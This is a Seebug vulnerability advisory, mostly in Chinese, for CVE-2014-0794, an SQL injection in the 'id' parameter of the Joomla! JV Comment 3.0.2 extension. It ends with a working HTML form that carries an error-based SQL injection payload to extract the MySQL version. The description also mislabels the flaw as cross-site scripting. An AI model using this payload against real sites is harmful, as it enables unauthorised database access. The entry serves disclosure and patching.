Joomla! JV Comment扩展'id'参数SQL注入漏洞

2014-02-10T00:00:00
ID SSV:61397
Type seebug
Reporter Root
Modified 2014-02-10T00:00:00

Description

BUGTRAQ ID: 64661 CVE(CAN) ID: CVE-2014-0794

JV Comment是Joomla!的一个扩展,可以将评论系统添加到文章内。

JV Comment for Joomla!(版本3.0.2),文件com_jvcomment在实现上存在跨站脚本漏洞,这可使远程攻击者在comment.like操作的id参数,利用此漏洞注入任意Web脚本或HTML,从而查看、添加、修改、删除后端数据库内的信息。 0 Joomla! JV Comment 3.0.2 厂商补丁:

Joomla!

目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:

http://www.joomlavi.com/joomla-extensions/jv-comment.html

                                        
                                            
                                                The following exploitation example displays version of MySQL database:


<form action="http://[host]/index.php" method="post" name="main">
<input type="hidden" name="option" value="com_jvcomment">
<input type="hidden" name="task"   value="comment.like">
<input type="hidden" name="id"     value="1 AND 1=(select min(@a:=1)from (select 1 union select 2)k group by (select concat(@@version,0x0,@a:=(@a+1)%2)))">
<input type="submit" id="btn">
</form>